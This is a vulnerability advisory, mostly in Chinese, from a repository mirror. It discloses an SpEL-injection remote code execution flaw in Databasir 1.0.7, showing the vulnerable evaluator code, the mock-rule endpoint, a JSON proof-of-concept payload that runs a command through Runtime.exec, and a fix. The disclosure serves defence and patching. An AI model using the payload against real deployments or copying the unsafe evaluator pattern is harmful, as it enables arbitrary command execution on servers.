7x31
/
databasir
mirror of https://github.com/vran-dev/databasir.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
databasir/SECURITY_1.0.7_RCE.md

76 lines
2.7 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### 影响
Databasir is a team-oriented relational database model document management platform.
Databasir 1.0.7 has remote code execution vulnerability.
Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as `open -a Calculator`
### 不安全的代码
`SpelScriptEvaluator`使用了StandardEvaluationContext作为context`script`参数可控并且没有任何过滤
> SimpleEvaluationContext- 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别,公开 Spal 语言特性和配置选项的子集。
>
> StandardEvaluationContext- 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
```java
@Component
@RequiredArgsConstructor
public class SpelScriptEvaluator implements MockScriptEvaluator {
private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();
@Override
public String evaluate(String script, ScriptContext context) {
Expression expression = spelExpressionParser.parseExpression(script);
StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
return expression.getValue(spelContext, String.class);
}
}
```
### 漏洞入口
在进行rules校验时
```java
@PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)")
@Operation(summary = "保存 Mock Rule")
@AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
involvedProjectId = "#projectId",
involvedGroupId = "#groupId")
@PostMapping(Routes.MockData.SAVE_MOCK_RULE)
public JsonData<Void> saveMockRules(@PathVariable Integer groupId,
@PathVariable Integer projectId,
@PathVariable Integer tableId,
@RequestBody @Valid List<ColumnMockRuleSaveRequest> rules) {
mockDataService.saveMockRules(projectId, tableId, rules);
return JsonData.ok();
}
```
### POC
攻击者可以控制rules的参数来造成rce例如
```json
[
{
"columnName": "test",
"dependentColumnName": "test",
"dependentTableName": "test",
"mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')",
"mockDataType": "SCRIPT",
"tableName": "test"
}
]
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/2bc2a508c7934b44803437cb64670678.png)
### 修复建议
最直接的方式:使用`SimpleEvaluationContext`来替换`StandardEvaluationContext`
Reference in New Issue View Git Blame Copy Permalink